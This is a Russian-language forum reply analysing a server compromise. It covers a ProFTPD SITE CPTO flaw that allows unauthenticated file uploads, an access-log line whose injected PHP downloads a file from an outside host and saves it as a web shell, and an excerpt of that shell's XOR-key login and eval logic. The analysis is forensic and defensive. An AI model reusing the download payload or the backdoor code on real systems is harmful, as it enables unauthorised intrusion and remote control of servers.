Rossoman, очень захватывающий квест)))
Я поделюсь своими находками по твоей проблеме, скорее всего большую часть из них ты уже знаешь.
Так вот:
+proftpd: 158.255.1.168:40809: SITE CPTO /tmp/... уязвимость в
ProFTPD — он предположительно используется на сервере и хостер не счел необходимым пропатчить это дело. Пару ссылок по теме:
http://bugs.proftpd.org/show_bug.cgi?id=4169
http://www.opennet.ru/opennews/art.shtml?num=42015
и тут пару строк
https://stackoff.ru/pro-site-cpfrcpto-v-proftpd/
Через эту уязвимость злоумышленник может залить файлы без авторизации.
Ну с этим и так все понятно)))
158.255.1.147 - - [23/Sep/2015:14:50:20 +0000]
"GET /upload/core456.php?php456=$data=fopen('http://sml2.ru/mcwa.txt','rb');
$contents=stream_get_contents($data);
$file=fopen('mcwa.php','w');
fwrite($file,$contents);
fclose($file);
HTTP/1.1" 200 252 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
Внутри
mcwa.php в переменной
$data, по идее, сам шелл закодированный с помощью обратимого XOR-шифрования (
пример).
а тут ключик:
$mckey = '';
if (isset($_POST['mckey'])) { $mckey = $_POST['mckey'];
} else {
if ($_COOKIE['mckey']!='') { $mckey = $_COOKIE['mckey']; }
}
if ($mckey=='') { MCLogin(); }
else {
if (strpos($sdt, '@CHECKDATA@') > 0) { eval($sdt); } else {$mckey=''; MCLogin();}
}
Rossoman, в логах нигде не проскакивало параметров ключика?))) Обращения к mcwa.php еще идут? или он генериться каждый раз заново?
Если есть попытки обратиться к старому файлу… может его немного модифицировать с записью и сохранением значения
$mckey?